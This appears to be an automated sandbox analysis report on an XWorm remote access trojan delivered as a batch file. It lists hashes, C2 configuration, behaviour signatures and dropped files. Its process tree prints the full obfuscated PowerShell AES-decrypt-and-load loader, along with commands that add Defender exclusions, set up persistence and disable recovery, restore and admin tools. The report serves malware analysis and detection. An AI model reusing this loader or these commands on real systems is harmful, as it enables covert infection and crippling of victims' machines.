
Analysis

  • max time kernel
    298s
  • max time network
    300s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags
    arch:x64
    arch:x86
    image:win11-20240802-en
    locale:en-us
    os:windows11-21h2-x64
    system
  • submitted
    25/08/2024, 06:57

General

  • Target

    Uni.bat

  • Size

    359KB

  • MD5

    358406bc7ed5155f85a5ff1c578ee295

  • SHA1

    4e333529ae320ad77ebcc36fd9baa55796dc001d

  • SHA256

    da95cdaddcd020f216d54f93ebb9f0c8246b9dc1d02d9df60d898bc6c58e8ecf

  • SHA512

    0017064f87d9b5458e17c7e7348aa1ad0a3b1713ae44c202ab71e271b6a8a76bed7a3142cebe0b4a10c08220fbfae4f109a784151ca85130d48dbcb4dee65f45

  • SSDEEP

    6144:ZbaZI71pQSxrJ9chRObtodtQlcxWHovdigPbYDDV:Zbac1ySxr/3bU3FzUh

Malware Config

Extracted

Family

xworm

Version

5.0

C2

las-protected.gl.at.ply.gg:59571

Mutex

bDBtf4nPCk2LZaWE

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Uni.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4852
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3076
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
        PID:3416
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3324
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_771_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_771.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1456
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_771.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_771.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:644
          • C:\Windows\system32\net.exe
            net file
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3460
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 file
              6⤵
              PID:1388
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Roaming\startup_str_771.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:696
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4128
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4256
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:3272
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4564
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:3408
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fhycjt.bat" "
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:4488
              • C:\Windows\system32\ReAgentc.exe
                reagentc /disable
                7⤵
                • Drops file in System32 directory
                • Drops file in Windows directory
                PID:3488
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
                7⤵
                PID:5096
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
                7⤵
                PID:1992
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
                7⤵
                PID:1532
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f
                7⤵
                PID:3188
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                7⤵
                • Modifies boot configuration data using bcdedit
                PID:4360
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
                7⤵
                PID:1520
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f
                7⤵
                PID:2036
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                7⤵
                PID:3408
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                7⤵
                PID:820
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                7⤵
                PID:3504
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f
                7⤵
                PID:4660
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
                7⤵
                • Disables RegEdit via registry modification
                PID:936
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f
                7⤵
                PID:1948
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f
                7⤵
                PID:4776
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f
                7⤵
                PID:3544
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f
                7⤵
                PID:4108
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f
                7⤵
                PID:760
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
                7⤵
                PID:3176
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
                7⤵
                PID:3028
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
                7⤵
                PID:4880
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled No
                7⤵
                • Modifies boot configuration data using bcdedit
                PID:2544
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f
                7⤵
                PID:5108
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f
                7⤵
                PID:3372
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f
                7⤵
                PID:424
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                7⤵
                PID:772
              • C:\Windows\system32\schtasks.exe
                schtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable
                7⤵
                PID:4940
              • C:\Windows\system32\schtasks.exe
                schtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable
                7⤵
                PID:4968
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f
                7⤵
                PID:3600
              • C:\Windows\system32\reg.exe
                REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f
                7⤵
                PID:2836
              • C:\Windows\system32\sc.exe
                sc config wercplsupport start=disabled
                7⤵
                • Launches sc.exe
                PID:4480
              • C:\Windows\system32\sc.exe
                sc config WerSvc start=disabled
                7⤵
                • Launches sc.exe
                PID:1544
  • C:\Users\Admin\Uni.exe
    C:\Users\Admin\Uni.exe
    1⤵
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    PID:124

                                                          Network

                                                          MITRE ATT&CK Enterprise v15


                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            7c6fe7c423380b59d82d999572ed03d1

                                                            SHA1

                                                            4a07399f1714b5cfaea2f92a952d1f4473c216ae

                                                            SHA256

                                                            acc79cc65eaea62a945398adad81cb5615e1480fa659c904aa5cd450165c3d66

                                                            SHA512

                                                            6e617a604568bafa22773bd3dab3b681ccfd6869ded8e11802cbbdd9ea71d4998e2a1bfcdcf07c4ec473c3b028fe593448a33e7e9c904792221e89fb8359d665

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            1KB

                                                            MD5

                                                            6ed6547d270ec2a3219183bfa73bc09b

                                                            SHA1

                                                            efbcbdbdccab903a79b2b0a65d882eca8bb81363

                                                            SHA256

                                                            f7511aa08a289c57af48cfffb1361623c47df6324b80f94841ba69c9497f9ac2

                                                            SHA512

                                                            d396cd37f446f9798dcd60229f0c2f55a4bdc0541149dea4be51236e7d91bc65f2bf9eee8327beafc3fe387dded9c3cc049e2101137e73956194e88939a7ec72

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            944B

                                                            MD5

                                                            1a9fa92a4f2e2ec9e244d43a6a4f8fb9

                                                            SHA1

                                                            9910190edfaccece1dfcc1d92e357772f5dae8f7

                                                            SHA256

                                                            0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

                                                            SHA512

                                                            5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            944B

                                                            MD5

                                                            fb7bab8a7df1534bf72a828c80bedafd

                                                            SHA1

                                                            8a16ed89ab9be4bc268a216d766657c145c904db

                                                            SHA256

                                                            cba5f5393d4fb84307f346daf784565732dc6ff11924d90c12b94039b91b5f8f

                                                            SHA512

                                                            9dd3796c61e2edff0780687d47325377f89319ca76ed7de60a12787e8830b901bb3353705b88b06a3c1640af7d268bb428f14a06ffb5c26e7c7891b53f421a92

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            944B

                                                            MD5

                                                            f8c40f7624e23fa92ae2f41e34cfca77

                                                            SHA1

                                                            20e742cfe2759ac2adbc16db736a9e143ca7b677

                                                            SHA256

                                                            c51a52818a084addbfa913d2bb4bb2b0e60c287a4cf98e679f18b8a521c0aa7b

                                                            SHA512

                                                            f1da3ec61403d788d417d097a7ed2947203c6bff3cf1d35d697c31edecdf04710b3e44b2aa263b886e297b2ce923fea410ccc673261928f1d0cd81252740dbe7

                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2l4xkmo.vjt.ps1

                                                            Filesize

                                                            60B

                                                            MD5

                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                            SHA1

                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                            SHA256

                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                            SHA512

                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                          • C:\Users\Admin\AppData\Local\Temp\fhycjt.bat

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            ecde221cbc92ee55ae5b8c1a24e98f56

                                                            SHA1

                                                            ebda0dba4abcd3bf93183e2787cc9e5f9f1448ee

    SHA256: b6fbab33e31d0a525d4c752886d812c1c46477f6314da7bde25bdc8198cb70cb
    SHA512: 122673ad96f1e407c75a93672f6538f342499f4e14221cbe4103c601362667487f3f33800230572e255b55e691e5068adce6336a4ffe1a651bff465d2c2d3493

  • C:\Users\Admin\AppData\Roaming\startup_str_771.bat
    Filesize: 359KB
    MD5: 358406bc7ed5155f85a5ff1c578ee295
    SHA1: 4e333529ae320ad77ebcc36fd9baa55796dc001d
    SHA256: da95cdaddcd020f216d54f93ebb9f0c8246b9dc1d02d9df60d898bc6c58e8ecf
    SHA512: 0017064f87d9b5458e17c7e7348aa1ad0a3b1713ae44c202ab71e271b6a8a76bed7a3142cebe0b4a10c08220fbfae4f109a784151ca85130d48dbcb4dee65f45

  • C:\Users\Admin\AppData\Roaming\startup_str_771.vbs
    Filesize: 115B
    MD5: 0e55927f429063811a190d04794df2f6
    SHA1: bfaee1af4ef1ad68e72c193c70f3cdec52f7c5cc
    SHA256: 21427c7ad9eadc7121a87505073598ab7674a940626c9eff320a0a043733f513
    SHA512: f54b744ce29fc485377542e84ed798288e3eac4c0b9c356cbd8795bf9019614fd10bbdb361b7248457890d50c463a84905b15627cc3db0cfa1ab6c2c33823f33

  • C:\Users\Admin\Uni.exe
    Filesize: 440KB
    MD5: 0e9ccd796e251916133392539572a374
    SHA1: eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
    SHA256: c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
    SHA512: e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

  • memory/124-101-0x000001AEF90F0000-0x000001AEF9136000-memory.dmp
    Filesize: 280KB

  • memory/696-47-0x0000015BF56E0000-0x0000015BF56F0000-memory.dmp
    Filesize: 64KB

  • memory/1456-24-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp
    Filesize: 10.8MB

  • memory/1456-29-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp
    Filesize: 10.8MB

  • memory/1456-26-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp
    Filesize: 10.8MB

  • memory/1456-25-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp
    Filesize: 10.8MB

  • memory/3324-10-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp
    Filesize: 10.8MB

  • memory/3324-48-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp
    Filesize: 10.8MB

  • memory/3324-0-0x00007FFB015B3000-0x00007FFB015B5000-memory.dmp
    Filesize: 8KB

  • memory/3324-9-0x0000023697B80000-0x0000023697BA2000-memory.dmp
    Filesize: 136KB

  • memory/3324-14-0x00000236AFE20000-0x00000236AFE54000-memory.dmp
    Filesize: 208KB

  • memory/3324-13-0x00000236AFDF0000-0x00000236AFDF8000-memory.dmp
    Filesize: 32KB

  • memory/3324-12-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp
    Filesize: 10.8MB

  • memory/3324-11-0x00007FFB015B0000-0x00007FFB02072000-memory.dmp
    Filesize: 10.8MB